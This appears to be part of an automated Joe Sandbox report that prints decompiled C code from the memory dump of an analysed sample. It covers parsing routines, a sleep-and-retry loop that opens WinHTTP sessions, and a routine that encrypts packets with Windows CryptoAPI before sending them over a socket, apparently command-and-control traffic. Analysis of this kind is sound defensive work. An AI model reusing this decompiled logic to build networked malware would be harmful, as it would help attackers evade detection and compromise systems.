				intOrPtr* _t71;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t75;
				intOrPtr* _t76;
				intOrPtr* _t77;
				intOrPtr* _t79;
				intOrPtr* _t80;
				intOrPtr* _t85;
				intOrPtr* _t86;
				intOrPtr* _t89;
				intOrPtr _t92;
				void* _t96;
				intOrPtr* _t97;
				intOrPtr _t105;
				intOrPtr _t110;
				intOrPtr _t127;
				intOrPtr* _t128;
				void* _t129;
				void* _t130;

				_t127 = __ecx;
				_t54 =  *((intOrPtr*)(__ecx + 4));
				_v32 = __ecx;
				_v20 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				if(_t54 != 0) {
					_t56 =  *((intOrPtr*)( *((intOrPtr*)( *_t54 + 0xb4))))(_t54,  &_v20, _t96);
					_t97 = __imp__#6;
					__eflags = _t56;
					if(_t56 >= 0) {
						_t66 = _v20;
						__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t66 + 0xa4))))(_t66,  &_v12);
						if(__eflags >= 0) {
							E00399090(__eflags,  &_v232, 0xa3);
							_t105 =  *0x3b8628; // 0x593938
							_t130 = _t129 + 8;
							_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t105 + 0xe0))))(_v12,  &_v232);
							__eflags = _t71;
							if(_t71 == 0) {
								_t72 = _v20;
								_t74 =  *((intOrPtr*)( *((intOrPtr*)( *_t72 + 0x34))))(_t72,  &_v8);
								__eflags = _t74;
								if(_t74 >= 0) {
									__eflags = _t74 - 1;
									if(_t74 == 1) {
										L19:
										_v28 = 1;
									} else {
										while(1) {
											_t75 = _v12;
											__eflags = _t75;
											if(_t75 != 0) {
												 *_t97(_t75);
											}
											_t76 = _v16;
											__eflags = _t76;
											if(_t76 != 0) {
												 *_t97(_t76);
											}
											_t77 = _v8;
											_v12 = 0;
											_v16 = 0;
											_t79 =  *((intOrPtr*)( *((intOrPtr*)( *_t77 + 0xa4))))(_t77,  &_v12);
											__eflags = _t79;
											if(_t79 < 0) {
												goto L20;
											}
											_t80 = _v8;
											__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t80 + 0x68))))(_t80,  &_v16);
											if(__eflags >= 0) {
												E00399090(__eflags,  &_v232, 0xa4);
												_t110 =  *0x3b8628; // 0x593938
												_t130 = _t130 + 8;
												_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t110 + 0xe0))))(_v12,  &_v232);
												__eflags = _t85;
												if(_t85 == 0) {
													_t92 = _v16;
													__imp___wtoi(_t92);
													_t130 = _t130 + 4;
													 *((intOrPtr*)(_t127 + 0x10)) = _t92;
												}
												_t86 = _v8;
												_t128 =  *((intOrPtr*)( *((intOrPtr*)( *_t86 + 0x40))))(_t86,  &_v24);
												__eflags = _t128;
												if(_t128 >= 0) {
													_t89 = _v8;
													 *((intOrPtr*)( *((intOrPtr*)( *_t89 + 8))))(_t89);
													_v8 = _v24;
													_v24 = 0;
													__eflags = _t128 - 1;
													if(_t128 != 1) {
														_t127 = _v32;
														continue;
													} else {
														goto L19;
													}
												}
											}
											goto L20;
										}
									}
								}
							}
						}
					}
					L20:
					_t57 = _v16;
					__eflags = _t57;
					if(_t57 != 0) {
						 *_t97(_t57);
					}
					_t58 = _v12;
					__eflags = _t58;
					if(_t58 != 0) {
						 *_t97(_t58);
					}
					_t59 = _v8;
					__eflags = _t59;
					if(_t59 != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t59 + 8))))(_t59);
					}
					_t60 = _v20;
					__eflags = _t60;
					if(_t60 != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t60 + 8))))(_t60);
					}
					return _v28;
				} else {
					return 0;
				}
			}






































    0x003928ea
    0x003928ec
    0x003928f2
    0x003928f5
    0x003928f8
    0x003928fb
    0x003928fe
    0x00392901
    0x00392904
    0x00392909
    0x00392921
    0x00392923
    0x00392929
    0x0039292b
    0x00392931
    0x00392943
    0x00392945
    0x00392957
    0x0039295f
    0x00392965
    0x00392976
    0x00392978
    0x0039297a
    0x00392980
    0x0039298d
    0x0039298f
    0x00392991
    0x00392997
    0x0039299a
    0x00392a5f
    0x00392a5f
    0x003929a0
    0x003929a5
    0x003929a5
    0x003929a8
    0x003929aa
    0x003929ad
    0x003929ad
    0x003929af
    0x003929b2
    0x003929b4
    0x003929b7
    0x003929b7
    0x003929b9
    0x003929bf
    0x003929c2
    0x003929cf
    0x003929d1
    0x003929d3
    0x00000000
    0x00000000
    0x003929d9
    0x003929e8
    0x003929ea
    0x003929f8
    0x00392a00
    0x00392a06
    0x00392a17
    0x00392a19
    0x00392a1b
    0x00392a1d
    0x00392a21
    0x00392a27
    0x00392a2a
    0x00392a2a
    0x00392a2d
    0x00392a3c
    0x00392a3e
    0x00392a40
    0x00392a42
    0x00392a4b
    0x00392a50
    0x00392a53
    0x00392a56
    0x00392a59
    0x003929a2
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00392a59
    0x00392a40
    0x00000000
    0x003929ea
    0x003929a5
    0x0039299a
    0x00392991
    0x0039297a
    0x00392945
    0x00392a66
    0x00392a66
    0x00392a69
    0x00392a6b
    0x00392a6e
    0x00392a6e
    0x00392a70
    0x00392a73
    0x00392a75
    0x00392a78
    0x00392a78
    0x00392a7a
    0x00392a7e
    0x00392a80
    0x00392a88
    0x00392a88
    0x00392a8a
    0x00392a8d
    0x00392a8f
    0x00392a97
    0x00392a97
    0x00392aa1
    0x0039290c
    0x00392912
    0x00392912

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003AEB87, Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 83
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003945F3, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 159sleep
    C-Code - Quality: 96%
    			E003945F3(intOrPtr* __ebx) {
				intOrPtr _t61;
				intOrPtr _t63;
				intOrPtr _t71;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr* _t96;
				intOrPtr _t98;
				signed int* _t99;
				intOrPtr* _t101;
				intOrPtr _t102;
				intOrPtr _t106;
				signed int _t110;
				intOrPtr _t113;
				intOrPtr _t117;
				signed int _t120;
				signed short* _t121;
				intOrPtr _t127;
				signed int _t135;
				signed int _t140;
				void* _t142;
				intOrPtr _t143;
				intOrPtr _t145;
				intOrPtr* _t146;
				void* _t147;
				void* _t149;
				void* _t150;

				_t101 = __ebx;
				do {
					_t61 =  *0x3b8628; // 0x593938
					 *((intOrPtr*)( *((intOrPtr*)(_t61 + 0xac))))(0x3b8594);
					if( *(_t147 - 8) < 0) {
						L13:
						 *(_t147 - 8) = 0xffffffff;
						L14:
						_t63 =  *0x3b8628; // 0x593938
						 *((intOrPtr*)( *((intOrPtr*)(_t63 + 0xc4))))(0x3b8594);
						_t22 = _t147 - 8;
						 *_t22 =  *(_t147 - 8) + 1;
						if( *_t22 == 0) {
							_t143 =  *((intOrPtr*)(_t147 - 4));
							goto L37;
						}
						_t140 =  *(_t147 - 0x1c);
						_t143 = 0;
						do {
							_t81 = E003B1280(0, _t147 - 0x41c);
							_t150 = _t149 + 4;
							_push(0x1c);
							if(_t81 == 0) {
								L0039A47E();
								_t149 = _t150 + 4;
								__eflags = _t81;
								if(_t81 == 0) {
									L21:
									_t82 = 0;
									__eflags = 0;
									L22:
									 *((intOrPtr*)(_t147 - 0x10)) = _t82;
									_push(_t140);
									_push(_t147 - 0x41c);
									if( *((intOrPtr*)( *((intOrPtr*)( *_t82 + 8))))() != 0) {
										 *((intOrPtr*)(_t147 - 4)) = _t143;
										__eflags = _t143 - 5;
										if(__eflags >= 0) {
											L32:
											_t110 =  *(_t147 - 0xc) + 1;
											 *(_t147 - 0xc) = _t110;
											if(_t110 > 0x4b0) {
												goto L38;
											}
											if(_t110 != (0x66666667 * _t110 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t110 >> 0x20 >> 2) + ((0x66666667 * _t110 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t110 >> 0x20 >> 2)) * 4 + (0x66666667 * _t110 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t110 >> 0x20 >> 2) + ((0x66666667 * _t110 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t110 >> 0x20 >> 2)) * 4) {
												Sleep(0x3e8); // executed
											} else {
												_t113 =  *0x3b8628; // 0x593938
												 *((intOrPtr*)( *((intOrPtr*)(_t113 + 0xc8))))(0xea60);
											}
											goto L37;
										}
										_t145 = 0;
										__eflags = 0;
										while(1) {
											_t96 = E003990F0(_t101,  *((intOrPtr*)(_t101 + 0x18)), _t140, _t145, _t147 - 0x18,  *_t101,  *((intOrPtr*)(_t101 + 4)),  *((intOrPtr*)(_t101 + 8)),  *((intOrPtr*)(_t101 + 0xc)),  *((intOrPtr*)(_t101 + 0x10)),  *((intOrPtr*)(_t101 + 0x14))); // executed
											__eflags = _t96;
											if(__eflags != 0) {
												break;
											}
											_t117 =  *0x3b8628; // 0x593938
											 *((intOrPtr*)( *((intOrPtr*)(_t117 + 0xc8))))(0x3e8);
											_t145 = _t145 + 1;
											__eflags = _t145 - 3;
											if(__eflags < 0) {
												continue;
											}
											 *((intOrPtr*)(_t147 - 4)) = _t145;
											L31:
											_t143 =  *((intOrPtr*)(_t147 - 4));
											goto L32;
										}
										 *((intOrPtr*)(_t147 - 4)) = 0;
										goto L31;
									}
									goto L23;
								}
								_t82 = E003B1D30(_t81); // executed
								goto L22;
							}
							L0039A47E();
							_t149 = _t150 + 4;
							if(_t81 == 0) {
								goto L21;
							}
							_t82 = L003B1DC0(_t81);
							goto L22;
							L23:
							_t143 = _t143 + 1;
						} while (_t143 < 5);
						 *((intOrPtr*)(_t147 - 4)) = _t143;
						goto L32;
					}
					_t102 =  *((intOrPtr*)(_t101 + 0x18));
					_t98 =  *((intOrPtr*)(_t102 + 8));
					_t120 =  *(_t147 - 8);
					if(_t120 >=  *((intOrPtr*)(_t98 + 0x18))) {
						L12:
						_t101 =  *((intOrPtr*)(_t147 + 8));
						goto L13;
					}
					_t121 =  *( *((intOrPtr*)(_t98 + 0x1c)) + _t120 * 4);
					_t146 = 0x200;
					_t99 = _t147 - 0x41c;
					_t142 = 0;
					while(1) {
						_t11 = _t146 + 0x7ffffdfe; // 0x7ffffffe
						if(_t11 == 0) {
							break;
						}
						_t135 =  *_t121 & 0x0000ffff;
						if(_t135 == 0) {
							break;
						}
						 *_t99 = _t135;
						_t99 =  &(_t99[0]);
						_t121 =  &(_t121[1]);
						_t146 = _t146 - 1;
						if(_t146 != 0) {
							continue;
						}
						L9:
						_t99 = _t99 - 2;
						_t142 = 0x8007007a;
						L10:
						 *_t99 = 0;
						if(_t142 < 0) {
							goto L12;
						}
						_t101 =  *((intOrPtr*)(_t147 + 8));
						 *(_t147 - 0x1c) =  *( *((intOrPtr*)( *((intOrPtr*)(_t102 + 8)) + 0x20)) +  *(_t147 - 8) * 4) & 0x0000ffff;
						goto L14;
					}
					__eflags = _t146;
					if(__eflags != 0) {
						goto L10;
					}
					goto L9;
					L37:
				} while (_t143 > 0);
				L38:
				_t65 =  *_t101;
				if( *_t101 != 0) {
					E0039BB40(_t65);
					_t149 = _t149 + 4;
				}
				_t66 =  *((intOrPtr*)(_t101 + 4));
				if( *((intOrPtr*)(_t101 + 4)) != 0) {
					E0039BB40(_t66);
					_t149 = _t149 + 4;
				}
				_t67 =  *((intOrPtr*)(_t101 + 8));
				if( *((intOrPtr*)(_t101 + 8)) != 0) {
					E0039BB40(_t67);
					_t149 = _t149 + 4;
				}
				_t68 =  *((intOrPtr*)(_t101 + 0x10));
				if( *((intOrPtr*)(_t101 + 0x10)) != 0) {
					E0039BB40(_t68);
					_t149 = _t149 + 4;
				}
				_t69 =  *((intOrPtr*)(_t101 + 0xc));
				if( *((intOrPtr*)(_t101 + 0xc)) != 0) {
					E0039BB40(_t69);
					_t149 = _t149 + 4;
				}
				E0039BB40(_t101);
				_t71 =  *((intOrPtr*)(_t147 - 0x10));
				 *((intOrPtr*)(_t147 - 0x18)) = 0x3b32ec;
				if(_t71 != 0) {
					_push(_t71);
					L00391CB0();
				}
				_t127 =  *0x3b8628; // 0x593938
				 *((intOrPtr*)( *((intOrPtr*)(_t127 + 0xac))))(0x3b8600);
				_t106 =  *0x3b8628; // 0x593938
				 *0x3b8618 =  *0x3b8618 - 1;
				 *((intOrPtr*)( *((intOrPtr*)(_t106 + 0xc4))))(0x3b8600);
				return 0;
			}





























    0x003945f3
    0x00394600
    0x00394600
    0x00394610
    0x00394616
    0x0039468d
    0x0039468d
    0x00394694
    0x00394694
    0x003946a4
    0x003946a6
    0x003946a6
    0x003946a9
    0x003947c3
    0x00000000
    0x003947c3
    0x003946af
    0x003946b2
    0x003946b4
    0x003946bb
    0x003946c0
    0x003946c3
    0x003946c7
    0x003946de
    0x003946e3
    0x003946e6
    0x003946e8
    0x003946f3
    0x003946f3
    0x003946f3
    0x003946f5
    0x003946f5
    0x003946fd
    0x00394704
    0x0039470b
    0x00394718
    0x0039471b
    0x0039471e
    0x00394771
    0x00394774
    0x00394775
    0x0039477e
    0x00000000
    0x00000000
    0x00394798
    0x003947bf
    0x0039479a
    0x0039479a
    0x003947ab
    0x003947ab
    0x00000000
    0x00394798
    0x00394720
    0x00394720
    0x00394722
    0x00394740
    0x00394745
    0x00394747
    0x00000000
    0x00000000
    0x00394749
    0x0039475a
    0x0039475c
    0x0039475d
    0x00394760
    0x00000000
    0x00000000
    0x00394762
    0x0039476e
    0x0039476e
    0x00000000
    0x0039476e
    0x00394767
    0x00000000
    0x00394767
    0x00000000
    0x0039470b
    0x003946ec
    0x00000000
    0x003946ec
    0x003946c9
    0x003946ce
    0x003946d3
    0x00000000
    0x00000000
    0x003946d7
    0x00000000
    0x0039470d
    0x0039470d
    0x0039470e
    0x00394713
    0x00000000
    0x00394713
    0x00394618
    0x0039461b
    0x0039461e
    0x00394624
    0x0039468a
    0x0039468a
    0x00000000
    0x0039468a
    0x00394629
    0x0039462c
    0x00394631
    0x00394637
    0x00394640
    0x00394640
    0x00394648
    0x00000000
    0x00000000
    0x0039464a
    0x00394650
    0x00000000
    0x00000000
    0x00394652
    0x00394655
    0x00394658
    0x0039465b
    0x0039465c
    0x00000000
    0x00000000
    0x00394664
    0x00394664
    0x00394667
    0x0039466c
    0x0039466e
    0x00394673
    0x00000000
    0x00000000
    0x00394682
    0x00394685
    0x00000000
    0x00394685
    0x00394660
    0x00394662
    0x00000000
    0x00000000
    0x00000000
    0x003947c6
    0x003947c6
    0x003947ce
    0x003947ce
    0x003947d4
    0x003947d7
    0x003947dc
    0x003947dc
    0x003947df
    0x003947e4
    0x003947e7
    0x003947ec
    0x003947ec
    0x003947ef
    0x003947f4
    0x003947f7
    0x003947fc
    0x003947fc
    0x003947ff
    0x00394804
    0x00394807
    0x0039480c
    0x0039480c
    0x0039480f
    0x00394814
    0x00394817
    0x0039481c
    0x0039481c
    0x00394820
    0x00394825
    0x0039482b
    0x00394835
    0x00394837
    0x00394838
    0x0039483d
    0x00394840
    0x00394851
    0x00394853
    0x00394859
    0x0039486a
    0x00394871

    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 003946C9
    • ??2@YAPAXI@Z.MSVCRT ref: 003946DE
    • Sleep.KERNELBASE(000003E8), ref: 003947BF
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    • ??3@YAXPAX@Z.MSVCRT ref: 00394838
      • Part of subcall function 003B1D30: WinHttpOpen.WINHTTP(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003B1D73
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00393070, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 154
    C-Code - Quality: 70%
    			E00393070(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v20;
				char _v24;
				char _v224;
				char _t52;
				char _t53;
				void* _t56;
				char _t57;
				char _t58;
				void* _t60;
				intOrPtr _t63;
				void* _t64;
				intOrPtr _t75;
				void* _t80;
				intOrPtr _t82;
				intOrPtr _t97;
				intOrPtr _t104;
				intOrPtr _t109;
				char _t111;
				void* _t114;
				void* _t116;

				_t81 = __ebx;
				_t111 = 0;
				_t114 = __ecx;
				_v24 = 0;
				_v12 = 0;
				_v8 = 0;
				E0039BB30( &_v20);
				E0039B1E0(__ebx,  &_v20);
				if(E0039A140( &_v20, _a4) == 0) {
					L20:
					_t52 = _v12;
					if(_t52 != 0) {
						__imp__#6(_t52);
					}
					_t53 = _v8;
					if(_t53 != 0) {
						__imp__#6(_t53);
					}
					L003926B0(_t81,  &_v20);
					return _v24;
				}
				_push(__ebx);
				_t56 = E0039DA00( &_v20);
				_t9 = _t111 + 1; // 0x1
				_t82 = _t9;
				if(_t56 == 0) {
					L18:
					_v24 = _t82;
					L19:
					_pop(_t81);
					goto L20;
				} else {
					goto L2;
				}
				do {
					L2:
					_t57 = _v12;
					if(_t57 != 0) {
						__imp__#6(_t57);
					}
					_t58 = _v8;
					_v12 = 0;
					if(_t58 != 0) {
						__imp__#6(_t58);
					}
					_v8 = 0;
					if(E003A0BE0( &_v20, _t111,  &_v12) == 0) {
						goto L19;
					} else {
						_t60 = E0039F2E0( &_v20, _t111,  &_v8);
						_t122 = _t60;
						if(_t60 == 0) {
							goto L19;
						}
						E00399090(_t122,  &_v224, 0x81);
						_t63 =  *0x3b8628; // 0x593938
						_t116 = _t116 + 8;
						_t64 =  *((intOrPtr*)( *((intOrPtr*)(_t63 + 0xe0))))(_v12,  &_v224);
						_t123 = _t64;
						if(_t64 == 0) {
							E00399090(_t123,  &_v224, 0x82);
							_t104 =  *0x3b8628; // 0x593938
							_t116 = _t116 + 8;
							_push( &_v224);
							_push(_v8);
							if( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0xe0))))() != 0) {
								E00399090(__eflags,  &_v224, 0x83);
								_t97 =  *0x3b8628; // 0x593938
								_t116 = _t116 + 8;
								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t97 + 0xe0))))(_v8,  &_v224);
								if(__eflags != 0) {
									E00399090(__eflags,  &_v224, 0x84);
									_t75 =  *0x3b8628; // 0x593938
									_t116 = _t116 + 8;
									__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t75 + 0xe0))))(_v8,  &_v224);
									if(__eflags != 0) {
										E00399090(__eflags,  &_v224, 0xc4);
										_t109 =  *0x3b8628; // 0x593938
										_t116 = _t116 + 8;
										_t80 =  *((intOrPtr*)( *((intOrPtr*)(_t109 + 0xe0))))(_v8,  &_v224);
										__eflags = _t80;
										if(_t80 == 0) {
											 *((intOrPtr*)(_t114 + 0x3c)) = _t82;
										}
									} else {
										 *((intOrPtr*)(_t114 + 0x38)) = _t82;
									}
								} else {
									 *((intOrPtr*)(_t114 + 0x34)) = _t82;
								}
							} else {
								 *((intOrPtr*)(_t114 + 0x30)) = _t82;
							}
						}
					}
					_t111 = _t111 + _t82;
				} while (_t111 < E0039DA00( &_v20));
				goto L18;
			}

























    0x00393070
    0x0039307b
    0x0039307d
    0x00393082
    0x00393085
    0x00393088
    0x0039308b
    0x00393093
    0x003930a6
    0x00393236
    0x00393236
    0x0039323d
    0x00393240
    0x00393240
    0x00393246
    0x0039324b
    0x0039324e
    0x0039324e
    0x00393257
    0x00393262
    0x00393262
    0x003930ac
    0x003930b0
    0x003930b5
    0x003930b5
    0x003930ba
    0x00393232
    0x00393232
    0x00393235
    0x00393235
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003930c0
    0x003930c0
    0x003930c0
    0x003930c5
    0x003930c8
    0x003930c8
    0x003930ce
    0x003930d1
    0x003930da
    0x003930dd
    0x003930dd
    0x003930eb
    0x003930f9
    0x00000000
    0x003930ff
    0x00393107
    0x0039310c
    0x0039310e
    0x00000000
    0x00000000
    0x00393120
    0x00393128
    0x0039312d
    0x0039313e
    0x00393140
    0x00393142
    0x00393154
    0x0039315c
    0x00393162
    0x0039316b
    0x00393172
    0x00393177
    0x0039318d
    0x00393195
    0x0039319b
    0x003931ae
    0x003931b0
    0x003931c3
    0x003931cb
    0x003931d0
    0x003931e3
    0x003931e5
    0x003931f8
    0x00393200
    0x00393206
    0x00393217
    0x00393219
    0x0039321b
    0x0039321d
    0x0039321d
    0x003931e7
    0x003931e7
    0x003931e7
    0x003931b2
    0x003931b2
    0x003931b2
    0x00393179
    0x00393179
    0x00393179
    0x00393177
    0x00393142
    0x00393223
    0x0039322a
    0x00000000

    APIs
      • Part of subcall function 0039B1E0: SysFreeString.OLEAUT32(?), ref: 0039B1F8
      • Part of subcall function 0039B1E0: SysFreeString.OLEAUT32(?), ref: 0039B201
    • SysFreeString.OLEAUT32(?), ref: 003930C8
    • SysFreeString.OLEAUT32(?), ref: 003930DD
      • Part of subcall function 003A0BE0: SysAllocString.OLEAUT32(?), ref: 003A0BF3
      • Part of subcall function 0039F2E0: SysAllocString.OLEAUT32(?), ref: 0039F2F4
    • SysFreeString.OLEAUT32(?), ref: 00393240
    • SysFreeString.OLEAUT32(?), ref: 0039324E
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003A5949, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 124network
    C-Code - Quality: 26%
    			E003A5949(intOrPtr* __eax, void* __eflags, void* _a4, int _a8) {
				void* _v8;
				signed int* _v12;
				char _v32;
				void _v148;
				void* __esi;
				void* _t35;
				void* _t49;
				signed int _t50;
				intOrPtr* _t62;
				signed int _t64;
				void* _t74;
				signed int* _t78;

				_t62 = __eax;
				_t74 =  *0x3b8538(0x200);
				_v8 = _t74;
				_v12 =  *0x3b8538(0x200);
				_t35 = memset(_t74, 0, 0x200);
				_t3 =  &_a8; // 0x3a6045
				 *_t74 = 0x22;
				__imp__#9( *_t3);
				 *(_t74 + 9) = _t35;
				_t7 = _t74 + 0xb; // 0xb
				memcpy(_t7, _a4, _a8);
				 *0x3b899c(_t62 + 8, _t74, 0x1fd);
				_t64 = 0x1d;
				memcpy( &_v148, _t62 + 8, _t64 << 2);
				 *0x3b8ab0( &_v148,  &_v32);
				_t78 = _v12;
				 *((intOrPtr*)(_v8 + 5)) = _v32;
				if(E003A3BB7(_t62 + 0xf0, _v8, 0x1fd,  &(_t78[0]), _t62 + 0x110, _t62 + 0x120) == 0) {
					L6:
					 *0x3b8540(_v8);
					 *0x3b8540(_t78);
					_t49 = 0;
				} else {
					_t50 =  *(_t62 + 4) & 0x0000ffff;
					__imp__#9(_t50);
					 *_t78 = _t50;
					_t78[0] = 3;
					if(E003AFD0B( *_t62, _t78, 0x200) != 0x200 || E003AFB73( *_t62, _v8, 0x200) != 0x200 ||  *((char*)(_v8 + 2)) != 3 || E003A3BB7(_t62 + 0x100, _v8 + 3, 0x1fd, _t78, _t62 + 0x124, _t62 + 0x134) == 0 ||  *_t78 != 0x28) {
						goto L6;
					} else {
						 *0x3b8540(_v8);
						 *0x3b8540(_t78);
						_t49 = 1;
					}
				}
				return _t49;
			}















    0x003a595b
    0x003a5963
    0x003a5966
    0x003a5976
    0x003a5979
    0x003a5981
    0x003a5984
    0x003a5987
    0x003a5990
    0x003a5997
    0x003a599b
    0x003a59a9
    0x003a59b1
    0x003a59c6
    0x003a59c8
    0x003a59d4
    0x003a59d7
    0x003a5a03
    0x003a5a7c
    0x003a5a7f
    0x003a5a86
    0x003a5a8c
    0x003a5a05
    0x003a5a05
    0x003a5a0a
    0x003a5a16
    0x003a5a19
    0x003a5a2a
    0x00000000
    0x003a5a90
    0x003a5a93
    0x003a5a9a
    0x003a5aa2
    0x003a5aa2
    0x003a5a2a
    0x003a5aa9

    APIs
    • memset.MSVCRT ref: 003A5979
    • htons.WS2_32(E`:), ref: 003A5987
    • memcpy.MSVCRT ref: 003A599B
      • Part of subcall function 003A3BB7: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,000001FD,?,?,?,?,00000000,00000200), ref: 003A3BCF
      • Part of subcall function 003A3BB7: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000020), ref: 003A3C60
      • Part of subcall function 003A3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003A3C71
      • Part of subcall function 003A3BB7: CryptImportKey.ADVAPI32(?,00000000,0000001C,00000000,00000000,?), ref: 003A3D87
      • Part of subcall function 003A3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003A3DD2
      • Part of subcall function 003A3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003A3DF2
      • Part of subcall function 003A3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003A3DFD
    • htons.WS2_32(?), ref: 003A5A0A
      • Part of subcall function 003AFD0B: htons.WS2_32(?), ref: 003AFDE5
      • Part of subcall function 003AFD0B: memcpy.MSVCRT ref: 003AFDF7
      • Part of subcall function 003AFD0B: memcpy.MSVCRT ref: 003AFE15
      • Part of subcall function 003AFD0B: memset.MSVCRT ref: 003AFE5E
      • Part of subcall function 003AFD0B: htons.WS2_32(00000301), ref: 003AFEB9
      • Part of subcall function 003AFD0B: htons.WS2_32(?), ref: 003AFEC2
      • Part of subcall function 003AFD0B: send.WS2_32(?,?,?,00000000), ref: 003AFED4
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBB0
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBC9
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBD8
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBED
      • Part of subcall function 003AFB73: htons.WS2_32(?), ref: 003AFC25
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCA2
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCB8
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCD6
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003B0A40, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122
    C-Code - Quality: 75%
    			E003B0A40(intOrPtr* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				char _v8;
				char _v12;
				char _v212;
				void* __ebx;
				void* _t34;
				void* _t40;
				intOrPtr _t47;
				signed int _t51;
				intOrPtr _t52;
				intOrPtr* _t53;
				intOrPtr _t59;
				intOrPtr _t61;
				intOrPtr _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				void* _t73;
				intOrPtr _t74;
				signed int _t76;
				void* _t77;
				void* _t78;

				_t73 = __esi;
				_t71 = __edi;
				_t51 = 0;
				_v8 = 0;
				_v12 = 0;
				E00399090(__eflags,  &_v212, 0xcf);
				_t34 = E00393C70( &_v12,  &_v212,  &_v8,  &_v12);
				_t78 = _t77 + 0x14;
				_t81 = _t34;
				if(_t34 != 0) {
					L2:
					if(_v8 == _t51) {
						L19:
						return _t51;
					}
					if(_v12 <= 4) {
						L17:
						_t36 = _v8;
						if(_v8 != 0) {
							E0039BB40(_t36);
						}
						goto L19;
					}
					_push(0x34);
					L0039A47E();
					_t78 = _t78 + 4;
					if(_t34 == _t51) {
						goto L17;
					}
					_push(_t73);
					_t74 = E003970B0(_t34);
					if(_t74 == _t51) {
						L16:
						goto L17;
					}
					_push(_t71);
					_t40 = E003B09A0(_a4, _t74,  &_v212, _v8, _v12);
					_t78 = _t78 + 0x14;
					if(_t40 == 0) {
						L14:
						E0039CB70(_t51, _t74, _t71);
						_push(_t74);
